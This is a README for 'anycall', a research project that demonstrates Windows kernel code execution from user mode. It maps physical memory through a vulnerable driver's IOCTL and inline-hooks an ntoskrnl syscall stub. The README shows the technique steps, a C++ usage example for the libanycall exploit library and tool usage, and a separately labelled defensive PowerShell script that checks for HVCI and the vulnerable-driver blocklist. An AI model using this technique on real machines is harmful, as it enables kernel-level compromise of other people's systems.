x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration

anycall

Read: https://www.godeye.club/2021/05/14/001-x64-windows-kernel-code-execution-via-user.html

How it works

  1. Map physical memory into user virtual memory (through the vulnerable driver's IOCTL)
    • Allows the user process to manipulate arbitrary physical memory without calling any further APIs
  2. Scan the entire physical memory until a function stub to hook is found in the physical pages of ntoskrnl.exe
  3. Once the stub is found, place an inline hook on it
    • Simply a jmp rax; the detour address can be anything we want to invoke
  4. syscall it
  5. Wow, we are in user mode but able to call kernel APIs
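From the defender's side, the steps above depend on two conditions: a driver exposing a physical-memory mapping IOCTL can be loaded, and a kernel code page reached through that mapping can be written. The following PowerShell script is an added example and is not part of the anycall project. It reports whether HVCI (hypervisor-protected code integrity, which keeps ntoskrnl code pages non-writable at the hypervisor level so the inline hook of step 3 cannot be written even through a second mapping of the same physical page) and the Microsoft vulnerable driver blocklist are active, and lists loaded drivers whose Authenticode signer is not Microsoft, which is the inventory to compare against a vulnerable-driver list. The function names are mine; the WMI class, its documented property encodings and the registry value name are Microsoft's.

```powershell
# Added example (not anycall project code): report the mitigations that block
# user-mode patching of ntoskrnl through a mapped physical page.
# Run from an elevated PowerShell session.

function Get-KernelHookMitigationStatus {
    # Win32_DeviceGuard is Microsoft's documented class for VBS/HVCI state.
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' `
                          -ClassName 'Win32_DeviceGuard' -ErrorAction Stop

    # Documented encodings: VirtualizationBasedSecurityStatus 2 = running;
    # SecurityServicesRunning contains 2 when HVCI is running (1 = Credential Guard).
    $vbsRunning  = ($dg.VirtualizationBasedSecurityStatus -eq 2)
    $hvciRunning = ([int[]]$dg.SecurityServicesRunning -contains 2)

    # Vulnerable driver blocklist switch (documented value under the CI config key);
    # a missing value means the OS default for this Windows build applies.
    $ciKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\CI\Config'
    $prop  = Get-ItemProperty -Path $ciKey -Name 'VulnerableDriverBlocklistEnable' `
                              -ErrorAction SilentlyContinue
    $blocklist = if ($null -eq $prop) { 'not set (OS default)' }
                 else { [bool]$prop.VulnerableDriverBlocklistEnable }

    [pscustomobject]@{
        VbsRunning                = $vbsRunning
        HvciRunning               = $hvciRunning
        VulnerableDriverBlocklist = $blocklist
        # Without HVCI, a mapped ntoskrnl code page can be patched as in step 3.
        KernelCodePatchable       = -not $hvciRunning
    }
}

function Get-NonMicrosoftKernelDrivers {
    # First-pass inventory of running drivers not signed by Microsoft. Caveat:
    # WHQL-signed third-party drivers carry a Microsoft publisher subject and are
    # excluded here, so a hash comparison against the blocklist remains the
    # authoritative check.
    Get-CimInstance -ClassName Win32_SystemDriver |
        Where-Object { $_.State -eq 'Running' -and $_.PathName } |
        ForEach-Object {
            # Normalise NT-style paths (\??\C:\..., \SystemRoot\...) to Win32 paths.
            $path = $_.PathName -replace '^\\\?\?\\', '' -replace '^\\SystemRoot', $env:SystemRoot
            $sig  = Get-AuthenticodeSignature -FilePath $path -ErrorAction SilentlyContinue
            $subject = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject }
                       else { '<unsigned or unreadable>' }
            if ($subject -notmatch 'Microsoft') {
                [pscustomobject]@{
                    Name   = $_.Name
                    Path   = $path
                    Signer = $subject
                    Status = if ($sig) { $sig.Status } else { 'Unknown' }
                }
            }
        }
}

Get-KernelHookMitigationStatus | Format-List
Get-NonMicrosoftKernelDrivers  | Format-Table -AutoSize
```

A host where `HvciRunning` is `$false` and the blocklist is off is the configuration in which the technique described above works; turning on Memory Integrity (HVCI) in Windows Security removes the writable-kernel-code precondition regardless of which driver is abused.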

Goal of this project

This project demonstrates how drivers that allow a user process to map physical memory are critically vulnerable.

Related CVEs:

libanycall

libanycall is a C++ static library that makes executing the anycall exploit easier.

Usage

  1. Link it (e.g., #pragma comment( lib, "libanycall64" ))
  2. Include the header (e.g., #include "libanycall.h")

For example:

#include <windows.h>
#include <cstdint>   // uint32_t
#include <cstdio>    // printf
#include <cstdlib>   // EXIT_SUCCESS / EXIT_FAILURE
#include <iostream>

#include "libanycall.h"

#pragma comment( lib, "libanycall64" )

// signature of the kernel export to call; ANYCALL_INVOKE resolves it by name
using PsGetCurrentProcessId = HANDLE( __fastcall* )( void );

int main( const int argc, const char** argv, const char** envp )
{
    // set up anycall using the NtTraceControl stub exported by ntdll.dll
    // (and present in ntoskrnl) as the hooked syscall
    if ( !libanycall::init( "ntdll.dll", "NtTraceControl" ) )
    {
        printf( "[!] failed to init libanycall\n" );
        return EXIT_FAILURE;
    }
    
    // invoke NT kernel APIs from usermode; the HANDLE-typed PID is
    // truncated to 32 bits for printing
    const uint32_t process_id =
        ( uint32_t )ANYCALL_INVOKE( PsGetCurrentProcessId );

    printf( "PsGetCurrentProcessId returns %u\n", process_id );

    return EXIT_SUCCESS;
}

License

MIT


Releases(release_2.0)
  • release_2.0(May 20, 2021)

    Release 2.0 includes libanycall, a C++ static library for executing the anycall exploit.

  • release_1.0(May 15, 2021)

    Usage

    anycall64.exe [module name] [procedure name]
    

    *Administrator privileges are not required to run it.

    The following arguments are supported:

    • (optional) module name: the module that exports [procedure name], e.g. ntdll.dll
    • (optional) procedure name: the function to hook, fetched from both ntoskrnl and [module name], e.g. NtTraceControl

    If not specified, ntdll.dll and NtTraceControl are used.
